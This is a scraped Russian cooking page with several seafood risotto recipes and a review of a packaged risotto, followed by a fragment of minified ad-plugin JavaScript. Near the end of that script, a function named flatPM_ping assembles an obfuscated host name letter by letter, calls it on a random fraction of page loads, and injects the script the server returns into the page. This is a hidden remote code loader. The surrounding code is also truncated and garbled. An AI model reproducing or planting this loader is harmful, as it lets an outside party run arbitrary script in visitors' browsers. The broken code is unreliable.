Ризотто с морепродуктами

Настоящее итальянское ризотто с морепродуктами в домашних условиях

Рецепт ризотто не такой сложный, как может показаться на первый взгляд. Вовсе не обязательно идти в ресторан, вполне можно приготовить настоящее итальянское ризотто с морепродуктами в домашних условиях. Все, что нужно, — так это знать некоторые тонкости приготовления, упустив которые, вкус блюда будет совершенно другим.

Главные правила:

  1. Для ризотто нужно использовать рис специального сорта.
  2. Бульон должен быть горячим и подливать его нужно порциями.
  3. Рис нужно чуточку не доварить.

Согласитесь, что справится даже начинающий кулинар!

Итак, сегодня мы предлагаем вам рецепт ризотто с морепродуктами. Лучше всего использовать рис сорта арборио или карнароли. Морепродукты подойдут замороженные, в виде морского коктейля — микса из креветок, мидий, кальмаров и пр. И обязательно добавьте томат, он сделает вкус вашего ризотто особенно интересным!

Ингредиенты:

  • Рис арборио – 170 г.
  • Морской коктейль (замороженный) – 300 г.
  • Репчатый лук – 1 шт.
  • Чеснок – 1-2 зубчика.
  • Помидор – 1 шт.
  • Соль – по вкусу.
  • Овощной бульон – 500-700 мл.
  • Растительное масло – 2 ст. л.
  • Белое сухое вино – 50 мл.
  • Сливочное масло – 50 г.

Время приготовления: 30 минут. Количество порций: 2.

Приготовление:

1. Морской коктейль разморозьте при комнатной температуре. Слейте всю жидкость из миски.

2. На небольшой сковороде растопите 20 г сливочного масла, бросьте целый зубчик чеснока, раздавленный при помощи ножа (прямо в шелухе), и обжаривайте в течение 1 минуты на маленьком огне — таким образом ароматизируется масло, то есть чеснок отдаст маслу весь свой аромат.

3. Выбросьте чеснок. И выложите на сковороду морской коктейль. Тушите 3-4 минуты, пока почти вся жидкость, которая из него выделится, не упарится. Слегка подсолите. Отставьте сковороду в сторону.

4. Репчатый лук очистите, измельчите кубиком. Разогрейте в сковороде растительное масло и пассеруйте на нем лук. Не зажаривайте слишком сильно! Лук должен размягчиться, но не подгореть, иначе ризотто будет горчить.

5. Всыпьте в сковороду рис арборио. Продолжайте обжаривать все вместе еще пару минут, пока рисинки не вберут в себя все масло и не станут полупрозрачными.

Обратите внимание, что рис для ризотто не нужно промывать — чем больше крахмала он сохранит, тем лучше, тогда ризотто получится густым и кремовым.

6. Влейте в сковороду белое сухое вино. Продолжайте готовить еще минуту, пока не выпарится весь спирт.

Вино должно быть сухим! Полусладкое и прочие сорта не годятся. Если подходящего вина нет, то готовьте без него, просто пропустите этот шаг.

7. Далее начините постепенно вливать овощной бульон — добавлять в сковороду с рисом его следует порциями, по одному половнику за раз и дожидаться, пока рисинки не впитают в себя очередную порцию и только после этого лить очередной половник.

Обратите внимание, что бульон должен быть горячим, поэтому поставьте кастрюлю с ним рядом со сковородой, пусть все время греется на слабом огне.

8. В целом рис для ризотто готовится 17 минут. За это время он должен стать кремообразным, но рисинки не должны развалиться и превратиться в нечто бесформенное, они должны сохранить целостность и быть аль денте, то есть чуточку недоваренными. Постоянно снимайте пробу! Когда ризотто будет готов, добавьте в сковороду 30 г сливочного масла, перемешайте, накройте крышкой и снимите с огня, пусть постоит пару минут и впитает в себя аромат масла.

9. Разогрейте морепродукты в сковороде и добавьте к ним свежий помидор, нарезанный кубиками.

10. Разложите ризотто по тарелкам, сверху выложите морепродукты, посыпьте свежемолотым черным перцем.

Рецепт ризотто с морепродуктами

Это итальянское блюдо – настоящая находка для отечественных хозяюшек, ведь один вид изысканного риса вызывает аппетит! С помощью наших инструкций вы сможете просто и быстро сделать своими руками настоящее ризотто с морепродуктами, рецепт которого вполне будет по силам даже начинающему кулинару. Вооружайтесь нашими советами, покупайте необходимые продукты и готовьтесь получить массу восхищения и похвалы от своих домочадцев!

СОДЕРЖАНИЕ:

Пошаговый рецепт ризотто с морепродуктами в домашних условиях

Учтите, что вкусное ризотто с морепродуктами в домашних условиях получается лишь тогда, когда вы ответственно относитесь к выбору продуктов – важно и их качество, и состав. Сделать традиционное блюдо Италии из неподходящего риса вам вряд ли удастся, а потому непременно купите заранее упаковку Арборио или Виалоне Нано.

Ингредиенты

  • Рис нужного сорта (желательно – Арборио) – 80 гр.;
  • Мидии свежие или замороженные – 5-6 шт.;
  • Тигровые креветки – 2 шт.;
  • Смесь морепродуктов (можно брать и замороженные) – 100 гр.;
  • Лук репчатый – 12 головки;
  • Чеснок – 1 зубок;
  • Бульон рыбный – около 200-300 мл.;
  • Петрушка свежая (зелень) – 0,5 пучка;
  • Вино белое сухое (лучше выбрать дорогое) – 80 гр.;
  • Масло оливковое – 3,5 ст.л.;
  • Смесь приправ из разных сушеных перцев – по вкусу.

Как приготовить ризотто с дарами моря в домашних условиях

Шаг 1.

Для начала, необходимо приготовить подходящий рыбный бульон. Варится ризотто с морепродуктами именно в нем, а не в простой воде, как плов в русской кухне. Лучше всего выбрать рыбу средней жирности и сварить из нее насыщенный бульон, но не приправлять его ничем – в процессе готовки мы итак будем солить и перчить рис.

Также учитывайте, что даже один и тот же сорт крупы неизбежно будет «съедать» разное количество жидкости в процессе приготовления, а потому бульона для морского ризотто лучше приготовить с запасом!

Шаг 2.

Когда бульон готов, переходим к следующему этапу. Половинку головки некрупной луковицы очищаем от кожуры и шинкуем небольшими брусочками. Также крошим свежую зелень петрушки, промыв часть пучка под проточной водой и удалив жесткие стебли. Чеснок давим ножом, держа его плашмя (это важно, так как нам не нужно измельчать пахучий ингредиент или толочь его в кашицу!).

Шаг 3.

3-3,5 столовых ложки масла оливок вливаем на подогретую сковороду (берите ту, что побольше – в нее необходимо будет поместить все продукты). Выкладываем в раскаленную посуду лучок и на среднем огне поджариваем его не более одной минутки, часто помешивая кухонной лопаточкой.

Шаг 4.

Раздавленный зубок чеснока кладем к пассерованному луку, после чего всыпаем в сковороду сухой рис. Важно помнить, что злак для ризотто промывать нельзя – итальянское блюдо получается влажным и имеет густую консистенцию, потому обмывать рис категорически нельзя, если вы не хотите испортить свои труды!

Шаг 5.

Размешиваем рис лопаткой или ложкой, обжаривая его на небольшом огне. Дожидаемся, когда наш итальянский злак изменит свой окрас (как следует прожарится), после чего добавляем в сковороду измельченную петрушку. Вслед за этим струйкой вливаем в рис чуть меньше половины стакана белого вина. Немного перемешиваем массу и ждем, когда испарится спирт.

Шаг 6.

Опускаем в полуготовое ризотто наши креветки, заливая их горячим рыбным бульоном (приблизительно половиной стакана). Ждем, когда дорогой морепродукт слегка протушится, после чего добавляем к нему очищенные мидии и остальную массу даров моря. Снова покрываем готовящееся блюдо сверху порцией рыбного бульона.

Шаг 7.

Третью порцию бульона вносим в сковородку, когда продукты в ней уже впитали всю жидкость. После этого посматриваем на часы – традиционное итальянское ризотто с морскими дарами готовится не дольше получаса, а в идеале – около двадцати минут.

В конце приправляем рис солью и перцем, сразу же пробуя на вкус. Если вы использовали замороженные морепродукты, то специй может понадобиться меньше – чаще всего такие ингредиенты поставляются в продажу уже подсоленными.

Шаг 8.

Когда блюдо готово, убираем из него чеснок и выбрасываем его. После этого извлекаем на тарелку целые морепродукты – мидии и креветки, чтобы они сохранили свой привлекательный вид при подаче. Добавляем в сковороду немного оливкового масла и размешиваем смесь несколько минут, хорошенько орудуя ложкой.

Подают ризотто с морепродуктами горячим и едят немедленно – хранить в холодильнике такое угощение нельзя, потому что рис потеряет свою консистенцию и привлекательный вид. А чтобы он не присох намертво к тарелке, перед тем, как порадовать вкусным ужином свою семью, немного подогрейте посуду.

Порционно разложите рис по тарелкам, а сверху украсьте целыми ломтиками морепродуктов и креветками. Приятного аппетита!

Простой рецепт приготовления ризотто с морепродуктами

Когда нет времени на щепетильное приготовление или домашние просят немедленно подать изысканное блюдо, можно воспользоваться адаптированным рецептом и сделать ризотто с морепродуктами без особых сложностей!

Ингредиенты

— Рис – 250 гр.;
— Бульон рыбный – около 1 л.;
— Оливковое масло – 2 ст.л.;
— Морской коктейль (подойдут любые и замороженные, и свежие морепродукты) – 400 гр.;
— Перец черный – щепотка;
— Лук репчатый – 1 шт.;
— Соль – по вкусу.

Приготовление морского ризотто

Для этого домашнего рецепта можно выбрать любой рис, главное – не промывать его перед готовкой, чтобы получилась нужная консистенция блюда. Традиционное ризотто с морепродуктами всегда имеет достаточно жидкости и не может быть сухим!

Бульон можно сварить заранее из любой рыбы, которая имеется в доме, но помните о том, что холодным бульоном рис заливать нельзя – сперва жидкость придется подогреть.

1. Лучок очищаем от кожуры и шинкуем мелкими кубиками. Если хотите получить более нежный вкус, можно использовать вместо репчатого лук-порей. Сковороду разогреваем на среднем огне, после чего вливаем немного оливкового масла и отправляем туда лучок. Хорошенько помешиваем и ждем, когда овощ станет полупрозрачным.

2. Когда это произойдет, всыпаем в сковородку рис и обжариваем его около 5 минут, перемешивая массу. После этого заливаем в сковороду неполный стакан рыбного бульона и даем ему полностью испариться и впитаться в белый злак.

3. Немного перемешиваем ризотто, после чего отправляем в посуду морепродукты. Даем им потомиться сверху около пары минуток на пару, после чего вновь отправляем в сковородку примерно один стакан бульона.

4. Стараемся размешивать рис осторожно, чтобы не повредить кусочки даров моря. Когда в сковородке вновь не останется жидкости, отправляем в нее третью чашку рыбного бульона и держим блюдо на огне еще 5-8 минут.

5. Выключаем огонь и приправляем ризотто с морепродуктами солью и перцем (при желании можно добавить и свежую зелень, любимые пряности). Размешиваем готовый рис несколько минуток, после чего раскладываем по тарелкам и подаем к столу.

При желании в ризотто с морепродуктами, рецепт которого описан выше, можно добавить немного твердого сыра – это может улучшить вкусовые качества итальянского плова, а также разнообразить меню, если вы уже готовили такое блюдо ранее.

Видео-рецепт приготовления ризотто с морепродуктами

Ризотто с морепродуктами

Известное итальянское блюдо из риса на вашей кухне! Это не плов и не каша. Ризотто имеет особую, сливочно-кремовую консистенцию, которая достигается специальной технологией приготовления. Жидкость при приготовлении ризотто вливается порциями после полного впитывания предыдущей.

  1. Главная
  2. Лучшие рецепты
  3. Категории рецепта
  4. Ризотто с морепродуктами

Ингредиенты и как готовить

ингредиенты на 4 порции или – количество продуктов для нужных вам порций будет подсчитано автоматически!’>

Всего:

Вес состава: 100 гр
Калорийность
состава:
205 ккал
Белков: 5 гр
Жиров: 12 гр
Углеводов: 19 гр
Б/Ж/У: 14 / 33 / 53
Н 5 / С 89 / В 6

Время приготовления: 30 мин

Пошаговое приготовление

Шаг 1:

Подготовить продукты. Морепродукты разморозить. У меня это креветки и морской коктейль. Рис выбирайте с большим содержанием крахмала, ни в коем случае не пропаренный.

Шаг 2:

Креветки надо очистить от панциря и внутренней кишки.

Шаг 3:

Лук мелко порезать, чеснок раздавить лезвием ножа.

Шаг 4:

На сковороде разогреть оливковое масло и выложить морепродукты. Обжарить их в течении 3-4 минут на сильном огне, дольше не нужно, они станут резиновыми. В самом конце морепродукты надо посолить.

Шаг 5:

На другой сковороде начинаем жарить лук и чеснок на оливковом масле. Огонь сделайте небольшой. Лук не должен подгореть или зазолотиться.

Шаг 6:

Когда лук станет прозрачным, высыпаем на сковороду рис. Обжариваем рис до прозрачности, огонь небольшой. Как только рис достигнет нужной консистенции, вливаем вино. Размешиваем рис, дожидаясь испарения алкоголя. Останется только аромат. Как только жидкость испарится, вливаем треть от всей воды, 80 мл. Далее ризотто варят при постоянном легком помешивании. Этим мы равномерно распределяем выделяющийся крахмал, что сделает риззото кремовым.

Шаг 7:

Как только вся первая порция воды выпарится, наливаем следующую. И снова размешиваем легкими движениями, ждем полного испарения. На это уходит около 4 минут. Снова доливаем воду, это уже будет третий раз, последний. Перед этим солим и приправляем рис. Если вдруг рис покажется вам сырым, повторите действие с водой еще один раз.

Шаг 8:

Когда рис будет почти готов – аль денте, то есть он останется немного твердым, и вся вода выпарится, кладем в него морепродукты. Затем вливаем сливки. Варим ризотто дальше около 3 минут, все также слегка помешивая.

Шаг 9:

В самом конце добавляем в ризотто сливочное масло, перемешиваем.

Шаг 10:

Накрываем крышкой и даем “отдохнуть” 2 минуты. При подаче посыпать петрушкой. Приятного аппетита!

Ризотто получилось очень кремовым, с ярким вкусом морепродуктов. Красный лук лучше не испоьзуйте при приготовлении, он окрасил рис в синий цвет.
Для более насыщенного вкуса можно использовать рыбный бульон.

Ризотто с морепродуктами Le specialita di Beppe Risotto di Mare. – отзыв

Как приготовить Ризотто с морепродуктами? Вкусно, легко и недорого! + Пошаговый Фоторецепт итальянского блюда!

Доброго времени суток, дорогие друзья! Наверняка, все вы слышали о таком необычном блюде, как Ризотто. Впервые мне удалось его распробовать в одном из итальянских ресторанов. Тогда бесподобный вкус ризотто надолго осел в моей памяти и чтобы снова его воспроизвести, я купила в Ашане продуктовый аналог – Ризотто с морепродуктами от марки Le specialita di Beppe.

Что же за блюдо такое Ризотто?

Ризотто – это класcическое итальянское блюдо, что в переводе с итальянского означает “маленький рис“. В настоящее время, существует масса вариантов приготовления ризотто.

ღღღღღღ Ризотто с морепродуктами от марки Le specialita di Beppe.ღღღღღღ

ღ Производитель: Италия.

ღ Объем: 500 гр. (2 полноценные порции).

ღ Упаковка: красочный пластиковый пакет, оформленный в красных тонах. На внешней стороне которой запечатлен наш наивкуснейший ризотто с лакомыми кусочками морепродуктов. На оборотной стороне производитель расписывает состав продукта и его приготовлениe.

Ризотто состоит из следующих натуральных ингредиентов:

рис Карнароли, томатная паста, бульон из моллюсков, мидии, кальмары, креветки, лук, белое вино, петрушка, соль, чеснок, оливковое масло, молотый перец.

По калорийности:

ღღ Наше блюдо получается бесподобно вкусным! А всё благодаря сочным мидиям, кальмарам и креветкам, которые сами по себе являются деликатесами. Пикантную нотку ризотто также добавляют белое вино и бульон из моллюсков. Такое сочетание продуктов я еще не пробовала!ღღ

ღღ Покупное покупным, но я больше всего люблю готовить дома заморские блюда. И хочу предложить вам рецепт приготовления Ризотто с морепродуктами с доступными продуктами.ღღ

ღღღღღღ Нам будут нужны следующие продукты:ღღღღღღ

  • Морепродукты (мидии, креветки, кальмары) – 200 г.
  • Рис – 150 г.
  • Лук репчатый – 1 шт.
  • Чеснок – 2 зубчика.
  • Томатная паста – 1 ст. л.
  • Вино белое – пол стакана,
  • Бульон (рыбный или овощной) – 400 мл.
  • Сыр – 30 г.
  • Масло оливковое – 4 ст. л.
  • Cвежая зелень.

На масле обжариваем нарезанный лук и чеснок, добавляем морепродукты и тушим 5 минут. Всё это помещаем в отдельную посуду, а на разогретой сковороде продолжаем тушить томатную пасту с рисом в течение 3 минут. Далее добавляем вино и тушим до выпаривания жидкости. По мере выкипания добавляем наш бульон. Смотрим, чтобы рис стал мягким. К рису потом добавляем покрошенную зелень, сыр, морепродукты, всё тщательно перемешиваем и оставляем тушить на 5 минут. Наше блюдо готово!

Оцените вместе со мной вкус необыкновенно красивого и вкусного блюда – Ризотто!

Приятного аппетита!

ღღღღღღ Спасибо за ваше внимание!ღღღღღღ

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};